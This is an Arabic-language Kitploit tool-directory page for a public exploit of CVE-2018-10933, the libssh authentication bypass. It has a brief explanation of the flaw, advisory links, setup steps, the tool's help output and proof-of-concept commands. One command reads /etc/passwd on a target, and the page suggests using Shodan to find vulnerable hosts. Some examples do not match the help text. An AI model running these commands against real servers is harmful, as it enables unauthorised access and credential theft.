Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/rubikcuv5/cve-2018-10933
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراق
GitHubrubikcuv5/cve-2018-10933

CVE-2018-10933

libSSH - تجاوز المصادقة

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-10933


تم اكتشاف ثغرة أمنية في آلة الحالة من جانب الخادم في libssh قبل الإصدارين 0.7.6 و0.8.4. يمكن للعميل الخبيث إنشاء قنوات دون إجراء المصادقة أولاً، مما يؤدي إلى وصول غير مصرح به.

بعض التفاصيل

تنشأ المشكلة من الطريقة التي لا يحافظ بها libssh على حالة المصادقة وكيف يمكن استغلال ذلك لتجاوز المصادقة. ببساطة، يمكن تصور الاتصال كعملية متعددة الخطوات: الخطوة 1، الخطوة 2، الخطوة 3... بما أن libssh لا يفرض ترتيب الخطوات، يمكنك القفز مباشرة إلى الخطوة 3 دون المرور بالخطوتين 1 و2.

من المثير للاهتمام أنه تم اكتشاف نفس المشكلة في مكتبة SSH Paramiko سابقًا: CVE-2018-7750.

الوثائق

Exploit-DB : https://www.exploit-db.com/exploits/45638

معلومات حول CVE-2018-10933 من libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

إصدار الإصلاح من libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

الإعداد

root@kitploit:~
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

الاستخدام

root@kitploit:~
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   

أمثلة إثبات المفهوم

مثال (تحقق مما إذا كان المضيف ضعيفًا)

root@kitploit:~
python3 main.py  0.0.0.0 -port 22  -t

مثال (إرسال أمر عبر وسيط)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"

مثال (استخدام وحدة تحكم تفاعلية بسيطة)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -l

Shodan.io libSSH

root@kitploit:~
[!] can find  devices vulnerables using shodan.io 
-  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )

المؤلفون

  • Rubickcuv
تنزيل الأداة